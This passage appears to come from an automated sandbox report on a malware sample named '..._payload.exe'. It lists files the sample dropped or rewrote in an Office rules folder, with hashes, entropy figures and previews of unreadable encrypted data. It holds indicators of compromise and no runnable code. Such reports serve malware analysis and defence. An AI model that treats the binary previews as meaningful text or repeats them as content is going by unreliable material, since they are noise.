                                                                                                                                                                      Preview:<?xml...T..=k.......h.m..;.....i.f;S.......x../....XT......ZH\..p...9L.......w....^z8.._....E .@....==.|.....9.R.C....JP8..#..&.b.}w.TFx.K..'.&y.....!...2F.....q.....E..T.....'...bke ..."2....H._....U....!E....'.........cN.:..=.A.......W....v....<7w..XP....;5....6t.c[..fH.,b~.:.q....C..9.*4...i1..H.N..RvSB......G!...I.X0..*M.<..r......N...gt<..ua"/?.#.x....#.'....*.I....q.O.(T....j...k..%.q...j.F..SCOn.-......?..T..i.E..EG..z.'....:h.X!..P..>.....h.l.|h..AV.]Iy.........S.de./..s..x.u.G.d.7......R'..6b.+P?...i]0... .fK...n..=.@.......`.8....-............wx.`.o..KFc8..y..yE{N.....av.....i..1.4.?....s.T>MC.S..A...`A...a.IuT..e..#M....;].~ .9Y....R...T.K.T.+r.....6&.6.....?|.q.......F.Go..,..mX...r.-8$X{p.l.E.Jd..-Ub.$=|Fvk..('.u.o6..m...@.l.s#.e.1...dfX5%..(.{p...1....W.g..M.....>...e.=....U4.....t........h.()LY..@.....u]..3-=|l..&.Z..t9l.Q.....+..I...y.>W....5r1.Hs..#.;...Z..z.......P!+.......U..0Y...l..v...).......8.O.`...z.....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10625v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3024
                                                                                                                                                                      Entropy (8bit):7.939704299659723
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Cw7evPbok2MBRDTKhbJWulSKWc4epvcy17qma/MCvmadOWtgWD:Cw7eXUk/PTKhVWuUKWc4epvcycma/nFd
                                                                                                                                                                      MD5:40818FA68D659E454EDB3E1572515915
                                                                                                                                                                      SHA1:719427E05218A389CED814D2A0EBF11DF91F849B
                                                                                                                                                                      SHA-256:4C80B50DD707A9CC4A7A5C2CE37C01C568C473D819B126FB92C6B989C71540A8
                                                                                                                                                                      SHA-512:F20489294D4C879082037F1399F1F0D4A413D43DFC01AD8BCF395A44FC5C57D3E8BAEF866613EE735CDD18BC9CEFAF4903EBA937171DF3D051292F5458319FF7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml@.X.@l...zy....;...qf..d.........`KZ............|0k.e.7...:-Q. .......q.:......^..;..M......l.Z..8....(...?.W.+.G....*..~..3.w..$M.Y...@..`"..~y!6.l.5.....6\.R....&./Kf]..#.q)#.y...3.f.!Qzi...zum.,.[.`....7b7}.B.Z.R.u......hN[.,.6b._..iP..M......).z/K...0....|xH........r.N.1<Y.p.....lf.<<F...0Z...fY4...O...N).F..Q.:.xe.R..s.lm..\.O......c.Y.=\.....&..N.<e......b....^...R..4".<:.-..:....a....e..T...7.......O.Y.....A.V}.. ...M.;..=....fd..>.....H.qsc.~.}..k.(.........f}...~........b...jI&.~U.C._..aw.=.LL.z...{.....E..~.......Yi8].c..b.....e..vz.f....(.\......e.c......?..t".c.x.^^.).I.s......T.6c{u...{#.......!.P.El.......rNpmD.{.*k......p.+._.|O..$......0^cPM..~8.v...R5.....J.e.-F..h<........@/.Z..]....f.......z.n.l^.}..o.O..s.[..;..~.L.7...Q..&.5G..j>..[R.."..~.?....Q-..-8..p'...E....t.._1.`....f....4.V..b.$.F.>..U.'...B.HO*^%..ZW..A.3.V.'..@,.%#jlt..P...r..;...!*..z..q..XEu.W9.B.....Mggg...$.)2p.":ji;..t0K2.F`..]..a

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10626v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1675
                                                                                                                                                                      Entropy (8bit):7.861691699756654
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:71TOU/SsNgwnGlZuIu8CaNZ7IrlVwQK9kqck9+caM6YZlR00tZnT2bD:xT30TL7IrF9XgZlDBAD
                                                                                                                                                                      MD5:9B76EFE8A485FC9465AB6CF6A76E91DC
                                                                                                                                                                      SHA1:C244C5F5084E6B40FDFD574699708B2A7F6A6B87
                                                                                                                                                                      SHA-256:DA851D93DD92F13BB869C8B9FC1932779493F01E49D82CA5BD069A73432DD55F
                                                                                                                                                                      SHA-512:63F2790EC60243D5423F55845E807B826F33E0B601FFED22570928E85C9735E5BC7D9342DC35D06CD2AEF2DBD972EE69BF6412D8D269F4560DD2FBAEEFBDD831
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlz..7.....tT..?XJ...t.0...g..g..,...S..9.B.R.Y...:I6.Z........e........}..C..r...{..U......1.....x.c..z...=.S,.YV.%.....Z..&.RhT..d.......t..;.7z..>..a..Rm..%Y{..V.ii.IY5M......[..5Mdb.DR.+&M.bE.2q..\.q;..A....Rh.\...|..Ag2.3.?..}.x...........R^_..Z .S....j}.2...*...F.3;lj0.)....n......}Q.^.6L.).......k.B..&__.q.. ..E..7. .&..4..4......7.....CY..(..r. ._...R%.+.(.....t......w.7D7c.;....:\.....T.0..3e.......u&I..PF.x.+PN...`L.>...@..:p.q.H"..Y..|p..l;.... .!E..[sj.q....u.L..b;T...2.mc.i...A..}S*.a..E.(h...S...5^.dz._.S.7.x.z$h...[I.N..O.O.(...E...|....U....B#..Mh[.9H.x..G1..s.s3(.\.q...y.~.m,...8?a.`.&9..\...<..n....JX..b!..k.q.....Z.....n....F.l....K.0g."P0..,.....\.r.....X.@.S.<......c.L..D....OaH.0,:...u.I........?.r_...o.l|...m.J.=.B@...L.}Lx'l.y....n.$..L....*"y....o....$.)Bd\.....|..O7..J_..;..YT.D.....v..w1....R6.4.[..1..$"...D".'.,..y2.<7.Pu`r...<..B.L.Ydmu...G...F..-V.=.......7..T.5../..#f.-gu.Z.=.*.....B..2....4.u..d"..:I.|,g..l..3

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10627v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2113
                                                                                                                                                                      Entropy (8bit):7.90785107835349
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:OqFQ/tPVfXASyiBmkFfxrpx1bm8ItqtBbGD:nFQFtvWiBDxdx1bIkO
                                                                                                                                                                      MD5:8E9EE013DB131C4F88CF1B95FAA51C4E
                                                                                                                                                                      SHA1:4046567ED95CA3FB9E63C822FE09B4F8DF48CBBB
                                                                                                                                                                      SHA-256:D16686B50C0726E6A018370E5A5632B688BFFB089F30822498739BCB9BE48F25
                                                                                                                                                                      SHA-512:C64625858038750078C7DEA1E5DA7D46FDDFCCF886C70B23754878708548C26641CE9E175285302F1DE205F78B48A7ED572ADCB9ED8973FC57475D2A1473D08D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..H,K.WX......+Qb-.x..Z.k..X...e..B..=ZF..sc.l..%-.P.... ..`..;w.S.yA.V."*.q7..}.8t.u....M.U...Wi.4.%.......T.z..n.-W9...u.bC...V>.-..d.....w,[.....C.7.!c.2b..>|.x7O.....+%J.}[=>..|.X....t'../.j)...Gpq..l.l...: ....w...Q..i......g"q...!...:........q..1....x..*w........f.@n.t.8UH../.........y.rd..v^^c{.y.C'...o.".e..V>.aoD.!Kj..]..!-.....a...]\O..Q...I.&05.9....Z\[..8..._.....B....}..\_.Ar.".7.W.v].5.U{O.Y|........t.@.1W..1..c.O5S........<...oQ.....8..IB..0K..GHU.H$./Y..*"...3..."..S.h.......bu..vM...z.d;;..n@.&....?4x.aa3..)...].._n.l*.+....z.!.j.E..B..F.............:..oL..0.w......e.%.Mb..`Z..-qZ.w.....d-...L..Nx8....KU)2..U.<.."b...V.)...V ..R...#P..G.Q.."....>.3$.....j\.>)4.:gS..x..=.U...N..G.......c......S.../2.j.s....=.....4.......C..n...9..TJ..:..".`BT...b..A.1../T...50...`..Y.4....%...u...Y(..z. ..(!...J.N.....N.6vT.H..O...Py)5_a....P..../...U.%..}..4.....$.9.n._..9..H.t.1...)...C.....A7.h*. ....)N..C+f...Q_..;.t(%...."....8...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10781v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):813
                                                                                                                                                                      Entropy (8bit):7.729771221419694
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:7Y0TYjtjwAbA/381RNYZUUEEV4WNU8aV2bD:7QnU/M1RNAUUpnNU8auD
                                                                                                                                                                      MD5:0C682CFC01ED91B04FE8D93DC5BE4AAC
                                                                                                                                                                      SHA1:1B56BBC7AED06F0994E9E4D5171871DAD526CB0D
                                                                                                                                                                      SHA-256:E9BF6864E21AF1E54C42678E2682B31CC228BEA78263A487EB2D74A21D75A92A
                                                                                                                                                                      SHA-512:5513CA3399D467374A067D9BFD6C14DC9450E04AB86A3F0FA19D37851DF465AC7C87EBF7B753560DAB7E6A97C20169CF6D47FB3DE9C55496516B1B84957285F1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..#.<;.\^...K:.0a*..!@.%..j...>5...s..e..........H.<.9.0.lL......g..py..L..b...BQ.A....E..`.H...o..EC.0.>j...a.....<@...}.gc:......S3.Y.Y7?.6..".......<dw.j.....}I...Z.I......fI....d.9.X...}..;?RY.(?....*...@..._.$.8[....).....N..o!......./....+@...w.B.R..].....|.21E...D..Ae#ej..6=..W@g....]..`wv..u.L..^...R...5.\7s......qJ..smI.#....9.y.......'C...D..ju.IM......+_.@....,T.....s=*~$\8...@.iY@........H..@).W.T"o. ...A(8..K.K>s....z.$_X.<.*...Q `.8s'?...9..#....`BP.h.Y....."XqW...02..{.N)...G..b9..i?gPw.djQ.PlF.."..%.K.....k.oF.{W.9...0Y..:.S..FZ...`8A.............9.lW.F.}w!....S.{.Y..u..#..<sY.7.!.S.4.^x.OP$OJL.0......(Ex...^U.T..)/GDs.OQ.D.....^...h...C.6..l.w.Z>.Tn.4.....#..*.D".....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10784v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2070
                                                                                                                                                                      Entropy (8bit):7.902138401104173
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:wCtoEp8R7xJU3SUISMDUabBfeZU0qN9GRLjxg+fZAD:wCto027xJmIS9axyU5WLl/c
                                                                                                                                                                      MD5:1AC1640DEBC79F864F9FC482E114C955
                                                                                                                                                                      SHA1:54EB44A27B8FEB838C0EE6E6D6BE3C0B54890121
                                                                                                                                                                      SHA-256:AFCC057AB9F73FF9CBB6585FD701A8B2BEFE95C0FB4EC3F48A754B0440392494
                                                                                                                                                                      SHA-512:328A762E86DEA74D5ADB5B9BEF2D2463E9C3B26FB9E1FED6B848CF5FDF5EC103AE8AC13FC51CE6E4C6E9A5F5CF8C380C639911BE6A8286353C0DC04620939F7C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.cti.k..<.....|.d...%2.)-r.c.d.....V..W.Tm5wUO}_or.)>k.N..O.H&;#it..H.C...2....I....o..C....^Q>......W.?..z...d..u.c....TA...t...Io...P....LA..?V..#.l.o.7.+..OD.......>\..!\...`..fR........E....IC.*@...}jGpH..Q....w......uj..?g....i...f.......K..n...]..{Bl..@kV......tz.......%.....+.cp..ptS......h.3..^4..~Wb...Y. .cC.${q.+.Zg......H.5..C.....'.vzDRBz.a.}.|U..&1....@Z.*..=.p......u..........R=.....W.-...o[2S.ay.nAQ...IkX...*v.=.~r'k9%._.`.?P196l^3..}.K|r.yPLJ...S....\.z..z....]+.ya.#V...j|..=*?.....=....1...Sj.>'.}.}\..~$..u.~.........K...Z9.+....W...m.:J..Q.p.L...@i..m....Y.f.Cn....K.!x6.t.......AA ..J..S...\l..KN#.....RL.k.2;..:RJ..6..7.u.pNX.9..M.G.gr...t$.D.).0....."`...u5..Y.{......t.,G.C.....m(n;cq+.+...-...$"`...0..R.......~..O(..^QO&5*w......&.....~O.2.....l...m......D...yj..............*9y....I.....^}'...o..L...`pa./p=~.X...of....b.<@..H.s.vDo....o...^.?..o.7.......a0u.g.....:....A.z?...9..r.u.e. I+...7..W.JR....T..q'../....\....t.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10800v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):789
                                                                                                                                                                      Entropy (8bit):7.73054233531516
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:PrULQWUTEN245EO8DVhUjrViKdCcxcYev/YNHIBEWV+EQogSUdNcii9a:6XUTqPhsKociBv/II+WV+voX2bD
                                                                                                                                                                      MD5:A8652A40CF2A8CF7C0DBD7885A9A8B64
                                                                                                                                                                      SHA1:5444CFA3F608DFEDC8D2E9922490D8695230998F
                                                                                                                                                                      SHA-256:7E6549DBB542BAB3F61A4879E5E3311805C84CDE0EAF6CCF92569699CF27E4FE
                                                                                                                                                                      SHA-512:335D65A233E8597F9E232E2ED5B5FE3AA6A6CE56F374861A03F4960E4D56FBA06001862FF7A4CFC3142268D8D96D221BA9AF2C6ACF1AB27E3D8CC7566A5AE2CC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.-G}: a!l..&.a..{..DNg+.>:...N=........_S......>..w...?.~O.g..$.yrmy.}.!o:G.7.k .t.#.zv......P....N+...J;TH90.\..HS:....i.{...."|.ta......j...R..BJ/j..H.!8.:.z@.....:.k6Vu.r_...9..?..,.[.*C#...ah.DS...!P#H.........t...5.t.....d.3...`@."....zo.R.x...-...j.....\..i1g?)5t....g.kG......J........_ .}....WG..{w......u...O..G...S.V^...Sz>....9.../...NB..;o[.T...2.-f...m....B.m.uHW......{....=...WSY_....:MR...../o...B..&.P.+........;..Q{....1".>..Gx+]dG..[c2k.7.X8s....x.u.[Y...w k].pWq.J....f.P{.w......n.z.....:.`..Ju.KY.H..f.wcq.}.e2....L(...nw...U......r...z.lM-.D.b*..........."."?<.3..i.02x...d.&...z......m.!.Z.n`...!....5.!B....J........Ln.S...t...._.h,..s....U.o._'mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10801v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3017
                                                                                                                                                                      Entropy (8bit):7.937805947029655
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:IoLULbEqszUmo/uKaNX04dJmoCqrKMBhS8DGg1Yxvx9feKvmULgcPJAzhNIxyVRH:ngPXLTWKwXbd7BhzNcTfeilLNPMTVRH
                                                                                                                                                                      MD5:D3D068AC1143B6ED900A60CD44852AD4
                                                                                                                                                                      SHA1:1360B5FD47C4E9B99A145633EE72CF11B469AD2E
                                                                                                                                                                      SHA-256:E2FEBB161A55F412B963215B8C16C80A6DBD87B46623085A8D6B59D0828CDDF5
                                                                                                                                                                      SHA-512:34C5C842735FC2E81DFFA2513C2770D5019BC987A2C76BC186E4C9D8A597AB3716BEAD9C52BA4AC724FD3425A3EF1233491F769DA203D20E9D2B749907A55C82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml......{~d.a.h.0.L...=..Q4..|.V......B...p..N....F\};y..fJK.nHWN3r.o..Y..p.~KC)%.0.g......?./{...H..Y.....{e.".._I.hY.r.....6~..".m..G.i...{......l..rB'?.6m...,.w.K.lX....5..;....L.?EN.....:.U{.&.-.4h.h*..6.......o.M....I...~.....I'.G..bc..V.hp!.j..~7..u.....q.....j..Q....[.T9.2...U"5......_.....@OM..r..r~.9....^......".f......u......I...F.4./..2[.z8...]..L3......]....`....?.....#.I..jv..f..;.......\.E...C...DH.....$...=U$.?..(@...h.....]..5X.r.B..N...=wE..9.............#.QBJ.6.......".....K.LQ../!..a\.A.V\@..,....W.7.y.F..}......w..ho.B..{..n"E.Gi;..qP.A.w.2..{..9.A.q.e.<.....lz..3...h..wM.....N.f....K......k..0.R..r.. .?fe..~xjE.Z..by...,..}PN....@i&$'B...[..q.Yz..M...e~.-..C.....qv.N.\Z....M-.m....>Ze.e..^+....+QD..T.P.....X.Z...t..Y...U..7.h.d.02..p....c....Y-..@%.4T.....-c.T.0..6opu.G..P.d.J.%......h*..]..'.....0.,]...W...*RR....R.F.7.}.3..F.- .j..y.{2.hT....i....y..e...V........EOMU...*..Q.[W.....!.K.E.;.E..n...w

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10802v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3017
                                                                                                                                                                      Entropy (8bit):7.931789398107447
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:NnnUXM3CTFcq5qP3uOHDDFo6urI049LCKv2yldjNQ4EXp7efbCqq7nJHr3x/7l8x:NUXM3CTKq5KoDIFLCKOgjCXYfWqq7JLS
                                                                                                                                                                      MD5:54597E786682B0174FAEA53689D076FA
                                                                                                                                                                      SHA1:254D529DBFA64DC476A75DF671F74D2F8381F8C7
                                                                                                                                                                      SHA-256:CCBCD6FF9BD00F90DB5FCB6E2533A241512BA66A89B66FF816B659C3530557D3
                                                                                                                                                                      SHA-512:79229C0BC6883B18939D60F2F5CFC92E264D70B383F6874C74ADE4C2E7463FA375C80B40AEDFC977F6EFB74D831CE0B85ACD1AF9C696DDA01336214381FA20C6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.6zz$..z.b.......w.>-..M.7.).r...........a.8.I.......M.q..[...)....e.:...._.i6...Z...X.&Hr.~...u7<..L..Nk.fr&..K.x.YzH...F..T..]...>.~...<...H' ..e.D../.....5...&...]..u..6[~.MP(..0.4#...J!....D....n..q?..V(...[.y%.6...R..,..>...+...]...D...NH.SG...%_M.4n.w....8...P........_......./VT..L7?R@RrR....J6).....)..m_.t....=.@..M..$R.@./mj.......=K......P...m..,\f...../......Y.H.j.M+P.V./...MV..(...C.I._C;....+.5...*..4?`....-T...t.d.....RZ...P.CQ...a...N.C...^#l..d..[).e.<s9D.....oDk.l..C...Y..-..LaH...xV.;.>....#...x..T<c..ZD....nM=&3.....l< ...U..<..V2.....y[.-GO...D<....Q.....R.r\........O..>"....bdn\.H. M..C...H....i:...8Q@{Yi\.X.$..Zx.;...%..F.xh.x....Y.,_.....ju]....]...o..........(O?{...7...Qg...\b..^....F..[BY.ZW.8Hf.......A.(...Gty..F.....m.S...4....w..:..]...o. ....iwBQ..4@.q[,.M....v..XE..Ob......_.&&.5!].....; WC.?.....>MG..j.....D....F.b.%.-g....`R.Q...m_......N.......jo....l........}.......1.%.H(...........

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10803v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4639
                                                                                                                                                                      Entropy (8bit):7.963877780548792
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:Xwl7NtRzoCatP0mWKjhfCSvGEBNlLoA0M7+gssZ2WZK9Spa9Atn:w59atdWQhqSvGEBNlkI7+gaGpZt
                                                                                                                                                                      MD5:B865B80292AC5ABF2C242EB36BC60F3D
                                                                                                                                                                      SHA1:49B0A7B3F54D90656FF7535E9D884D67B03BDEC5
                                                                                                                                                                      SHA-256:1E48542D20AF7432C25F4C92D70BC99132042B61239A0961DCA9408AA33A1EFD
                                                                                                                                                                      SHA-512:8A27C06107D8CA8090D5A70EB7DAED2D02D3394F58B6167EB7FE3A9450DBDC51F8B9BBCF4362E5AD05D2719EA44D6832701CB01FE2F59A84DAA4DE6D047FEE2C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlP.G.T/..LV...v.?X.X~y...Y..../..Qc......J....s..f..../....``....mr...1a.H..]t,..S.....#H.).>..{$+.......f.Y....{..&.sC.|S.@.....+.[?.(...~.q.~..kVAZ...(.R.F.P.}r.n..H.(.Ca.b.d....cp...../j'..I.(\..1..Y.....|...'..F.u.VBD.,..o.S@...3..c.0...c.......w..gO4............8......T.$..k.+%..*i....l......uz....'...I.<~.^..p.$H.....D....9X';+.[xaw.k...:4.t.G..pX..y...G}.....,.9.l5=p..AS....6.Zb...u.....P..NN+.oB{...=../..?...._......\..`D....(.c...N=.=V.sv...(.....}.z.16.UX......u.!d.U..3.(....b...py.~Z..;.e3..`.HsCF..3.....E*W..|.x.%..'...p....28..I.....c?.8.DX.....iL.P..).......o.y......#.8....lO...E.....4..s.nUi..a.G2.g......i+..:..7.}a..g.....V..]S.J.....!!.e*....:.[..t. ..........1..w...<;.M..bN.i...N......_A...?..T..c|...._..u.._r.L@.h..nL&..z.%E....T.......'{...N..ZI.ni..(...c..S?p.;...............j]KB.G.VF...../-K.T.w..K..N....9....s0.A.M.K....9@...Q.6..in.>..>...^...I."..+...D..[.........x..4. .......6.)^..z6p..^..y.-....,.uj.N..m.S..gr...Q...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10807v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1329
                                                                                                                                                                      Entropy (8bit):7.861885130872645
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:vDVrLHdn8QieZMhjWUKkZqdV4pxXP566AsuVlK7ci8YQth9YQlEmx2bD:vZrLHgj1n8dOxh6muVw7cJbXY1mKD
                                                                                                                                                                      MD5:CFC8EE1CAFCC7E3287BD62BD333D4928
                                                                                                                                                                      SHA1:66FBAB981B3D4174CCE93CC28464A62B7FEDC87E
                                                                                                                                                                      SHA-256:04AB5D87E4FC08363D3B4B1AFC6EF8DE31F4DF698EFC97242C0E0FFF6D9144DC
                                                                                                                                                                      SHA-512:1E3580B2A57D7C50A4AC098222DCE8998060BE38C649627E953CF24218FCF5400CD8162EFFCDC0189E8B7E59C99A20E764FD2DD0BF6F2A9AAEA7DB90B7BC8FD4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.$1mp/..U.g..4.G`.B.|.7>..z."v{....9.-3.9(.xa)6.q.X...:.N....Z.w..U...b...4...-.M.. .1.)....+q]...?.ig.p..]P.[I.?....s..J...L...\.....DI.....#M.B~..P.....{..../j....$F6n...5..K.*c..~..U...8...[......"...j.x..a..{..6)..T9..~p.D..Y.:.......%_|p...C.&..SI. ...=.......~.-..c...R...N[}O.....N...G.c.O0i .#....].Ych.-.V([.p.....W.]...'.@.m8X?..x.0..mh....?....1YU_..).t..&w!...:...].$..N...tT=....5.x..~....`.d&%..,.f3...Ff.h\4.;.M.n.Re9........EO.=0?.#Y.C{kXK...G'.I.P../.s.Y..R...*"1..9T..%...44..~..3...5.H:.g.6..0...d...(#...O..D...T..L....!.wS..6....]A.q.l......!b..:...s.\X.....,......"a..uh..g....0.~L....H..q?~,@..x....B.wY1.|...Hb....D..cC../...i...@\.).iG.Q.&.B...Q.:N.._zj?...~-.....d..iU.(&t.S.....i.p.[..f@...^...LaMJX..1...w~...C..x.1.q.nU..\..y]....#........0....zT.yi..j...RF. .2.R.!.7...g.ku.....Ng.(z......Xv.[}C<....~.<.|...../.*..%...A...e.Hq.U.../N.'..|.P....~1/.@....}.d..Y#Q....;...._.d.E..pJm9......,...V..H..`-...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10808v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1395
                                                                                                                                                                      Entropy (8bit):7.843613485129248
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:H3oJd4mAKq24vMRXfFovJIZkxOrbCHd6thnuZL3tHDkFx+2bD:H3q4mdq2nRXfeCZo7d6DnazUlD
                                                                                                                                                                      MD5:77FD669693CAF4E73C1454E8D317CCB6
                                                                                                                                                                      SHA1:1834E6AD6B3086EB55622BE3E543992CDAB0B2F6
                                                                                                                                                                      SHA-256:8AB20F025AC29C6D81C9F1B982AED40D3D71A723CEEC1E1EEEED95A7AF1DAA00
                                                                                                                                                                      SHA-512:E45BDBD9F6E1A0EDC0D06B850DEBF2B253D9BF11879C7C1C2EC240D58E1B16C5DD446DCCF784108918FC0681F5CCE6355C4D8BAD55FB46FC5F644ACD29CF4316
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.........-fRS....L.WD....L.1T4.p.P....c..../.Z.....j..cK-x.a:p2.\.;.....bGvB....#.y...J \x!Dt. .N2......&.zcty..<.!K.W.....a.t<t...l..%.mQ#..7Y.D......0..].'u.)n.eK}.o4..p|..}.9....Q..F....7...?&.,v...O..C{.}.._.q3.);......./.%?$4......$...*.>.......{.T.0...............ryy...."........0..C"..L2......yx..5n..N...'/.#...3.6..-.......}...\..:...4yth..".....n.;N.].0....<[.u.......{d.RI.xZ6.. .h.{....c..,.M.4U..:.flI...7.......e.....6x.o.[aN..@...#..,.4*t....N..oL...f.tV.m..uN......|Nr..8....s..`.K.No.V.....j..L{..........9MwD.".Hz..r@b2.".+b+Y:..w.(LE.. .k.?.M......<.7[.}^.H..Q.r<.......B..Q..R..6u.....1..*.q+......jw'.....K.{..Ig../.?.Cm..hd..E.9.,.Y...Y...$.W;..xoa...v.C..8I...Ol.)..!....;.?...n.:..o......e....G.F.y.....1..h..Y...q..l.*..W............%...T...._..*......X.y...[....I...0DAA....nD....`..'s.)...'..1..NhN5B.5. .?m..n:.....x...2.z.B.a"5(..8.......^...E.5..[...O.pL.2..P.8byjV.5.L.o..I......f.~.|).&..BPe...9..E.q.I.j

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10818v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1124
                                                                                                                                                                      Entropy (8bit):7.805184622831382
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:WHyV/2YWlHHHPI8fAdoKoGK1rDur1I2Q0D5WQJRUWH+pK90NaZjqVDxslh2bD:WSV2THHP7Y/vg8G2IgRUWHQKONejOFD
                                                                                                                                                                      MD5:7E56568804716A424D452D33322E0DA4
                                                                                                                                                                      SHA1:B0C67AF6312364C80EE19419A4620135E882A346
                                                                                                                                                                      SHA-256:F029EF4BFCBE1758CCA46138E051721F39CC19FD25EC1C90571379566473C3E1
                                                                                                                                                                      SHA-512:93471EA0608F57ECD2297DABFABAF6DBA6360E3776F0DEF412EF40BFC517C7F074BCB4E7FE3CB3D3A48CF1FAA55C64A02E0B12CE5A8FC1A9E46AD39BDB0FBD5E
                                                                                                                                                                      Malicious:false
